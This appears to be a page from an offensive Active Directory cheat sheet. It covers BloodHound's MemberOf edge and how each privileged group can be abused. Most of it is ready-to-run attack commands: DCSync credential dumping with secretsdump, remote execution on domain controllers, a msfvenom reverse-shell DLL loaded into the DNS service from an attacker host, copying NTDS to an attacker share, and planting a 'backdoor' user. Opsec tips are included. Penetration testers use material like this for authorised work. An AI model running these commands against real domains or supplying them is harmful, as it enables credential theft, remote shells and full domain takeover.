MemberOf
A principal is a member of a group. This edge is structural β it propagates the group's rights to the member.
Applies to: User/Group/Computer β Group
Note
MemberOf is not itself an abuse edge. It means the source object inherits all rights and edges of the target group. The abuse depends on what the group can do.
Common high-value group memberships and their abuse:
Domain Admins / Enterprise Admins
secretsdump (DCSync)
secretsdump.py <domain>/<username>:'<password>'@<dc-ip>
secretsdump.py -hashes :<ntlm-hash> <domain>/<username>@<dc-ip>
wmiexec / psexec to DC
wmiexec.py <domain>/<username>:'<password>'@<dc-ip>
psexec.py <domain>/<username>:'<password>'@<target>
Remote Desktop Users β CanRDP
xfreerdp /u:<username> /p:'<password>' /d:<domain> /v:<target>
Remote Management Users β CanPSRemote
evil-winrm -i <target> -u <username> -p '<password>'
DnsAdmins β DLL injection into DNS service (SYSTEM)
# 1. Build malicious DLL (msfvenom or custom)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-ip> LPORT=4444 -f dll -o evil.dll
# 2. Host DLL on SMB share
smbserver.py share /path/to/dir
# 3. Set DNS server plugin (requires dnscmd or PowerShell)
dnscmd <dc-ip> /config /serverlevelplugindll \\<attacker-ip>\share\evil.dll
# 4. Restart DNS service (requires SeRemoteShutdownPrivilege or sc)
sc \\<dc-ip> stop dns
sc \\<dc-ip> start dns
PowerShell (Windows)
dnscmd <dc-ip> /config /serverlevelplugindll \\<attacker-ip>\share\evil.dll
# Then restart DNS:
sc.exe \\<dc-ip> stop dns; sc.exe \\<dc-ip> start dns
Backup Operators β Registry dump / shadow copy for NTDS
# Backup Operators can read NTDS via shadow copy
wbadmin start backup -backuptarget:\\<attacker-ip>\share -include:c:\windows\ntds
# Or use BackupOperatorToDA tooling
Account Operators β Create/modify users and add to groups (except DA/EA)
New-ADUser -Name "backdoor" -AccountPassword (ConvertTo-SecureString '<password>' -AsPlainText -Force) -Enabled $true
Add-ADGroupMember -Identity "Remote Desktop Users" -Members "backdoor"
Opsec
- Group membership is resolved at logon token creation β changes require new logon to take effect
- Nested group membership (Group A MemberOf Group B) also propagates β check all ancestor groups in BloodHound